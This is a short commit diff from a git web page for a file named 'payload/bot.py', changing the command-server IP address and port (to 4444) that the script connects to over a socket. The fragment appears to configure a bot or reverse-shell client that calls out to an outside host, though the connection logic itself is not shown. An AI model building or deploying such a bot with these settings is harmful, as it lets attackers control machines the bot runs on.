Update payload/bot.py
This commit is contained in:
parent
b767a7151a
commit
2a61dcea01
@ -2,8 +2,8 @@ import socket
|
||||
import os
|
||||
import sys
|
||||
|
||||
SERVER_HOST = "178.63.100.123" # Replace with server IP
|
||||
SERVER_PORT = 14006
|
||||
SERVER_HOST = "45.32.114.152" # Replace with server IP
|
||||
SERVER_PORT = 4444
|
||||
|
||||
|
||||
def connect_to_server(bot_name):
|
||||
|
Loading…
Reference in New Issue
Block a user